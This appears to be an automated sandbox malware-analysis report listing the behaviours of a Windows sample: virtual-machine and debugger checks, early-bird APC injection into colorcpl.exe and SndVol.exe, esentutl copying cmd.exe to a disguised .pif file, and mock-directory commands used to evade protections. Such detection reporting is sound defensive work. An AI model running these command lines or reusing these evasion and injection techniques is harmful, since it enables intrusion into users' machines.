Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320F7E2 Sleep,ExitProcess,		11_2_0320F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8F7E2 Sleep,ExitProcess,		21_2_02E8F7E2

Contains functionality to enumerate running services

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		11_2_0321A7D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		21_2_02E9A7D9

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.pif	API coverage: 6.3 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 4.9 %
Source: C:\Users\Public\alpha.pif	API coverage: 7.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 4.9 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\xpha.pif	Last function: Thread delayed

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02C95908
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	7_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	7_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	7_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	7_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	7_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0321C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0320C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0320928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_032096A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_03219B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03207877 FindFirstFileW,FindNextFileW,	11_2_03207877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_03208847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0324E8F9 FindFirstFileExA,	11_2_0324E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0320BD72
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	15_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	15_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	15_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	15_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	15_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E8928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	21_2_02E8C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	21_2_02E9C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E896A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW,	21_2_02E99B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ECE8F9 FindFirstFileExA,	21_2_02ECE8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW,	21_2_02E87877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	21_2_02E88847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	21_2_02E8BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_03207CD2

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1611613314.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: xpha.pif, 00000010.00000002.1713024647.0000000002590000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 00000013.00000002.1713335088.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 0000001F.00000002.1804537208.0000000000618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\nft438A5fN.exe

API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02CAF744

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320F3FE LdrInitializeThunk,

11_2_0320F3FE

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\alpha.pif

Code function: 7_2_00062E37 IsDebuggerPresent,

7_2_00062E37

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CA894C

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D5A8E5 mov eax, dword ptr fs:[00000030h]	0_2_02D5A8E5
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006C1FA mov eax, dword ptr fs:[00000030h]	7_2_0006C1FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03243355 mov eax, dword ptr fs:[00000030h]	11_2_03243355
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006C1FA mov eax, dword ptr fs:[00000030h]	15_2_0006C1FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EC3355 mov eax, dword ptr fs:[00000030h]	21_2_02EC3355

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\alpha.pif

Code function: 7_2_0004A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW,

7_2_0004A9D4

Source: C:\Users\Public\alpha.pif	Code function: 7_2_00056EC0 SetUnhandledExceptionFilter,	7_2_00056EC0
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00056B40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0323503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0323BB71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03234BD8 SetUnhandledExceptionFilter,	11_2_03234BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03234A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_03234A8A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00056EC0 SetUnhandledExceptionFilter,	15_2_00056EC0
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00056B40
Source: C:\Users\Public\xpha.pif	Code function: 16_2_000F3600 SetUnhandledExceptionFilter,	16_2_000F3600
Source: C:\Users\Public\xpha.pif	Code function: 16_2_000F3470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_000F3470
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_02EB503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_02EB4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB4BD8 SetUnhandledExceptionFilter,	21_2_02EB4BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_02EBBB71

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\nft438A5fN.exe	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3200000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E80000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3290000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\nft438A5fN.exe

Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe

Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		11_2_03212132
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		21_2_02E92132

Contains functionality to simulate mouse events

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03219662 mouse_event,

11_2_03219662

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02D4C246 cpuid

0_2_02D4C246

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02C95ACC
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: GetLocaleInfoA,	0_2_02C9A7C4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: GetLocaleInfoA,	0_2_02C9A810
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02C95BD8
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	7_2_00048572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	7_2_00046854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	7_2_00049310
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_03252393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_03252143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_0325201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_032520B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_03252690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_032525C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_032524BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_03248484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	11_2_0320F90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_0324896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_03251FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_03251D58
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	15_2_00048572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	15_2_00046854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	15_2_00049310
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	21_2_02ED2393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02ED20B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02ED201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	21_2_02ED2143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	21_2_02ED2690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	21_2_02ED24BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02EC8484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	21_2_02ED25C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	21_2_02EC896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	21_2_02E8F90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02ED1FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	21_2_02ED1D58

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02C9920C GetLocalTime,

0_2_02C9920C

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0321B69E GetUserNameW,

11_2_0321B69E

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_032493E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_032493E5

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02C9B78C GetVersionExA,

0_2_02C9B78C

AV process strings found (often used to terminate AV products)

Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
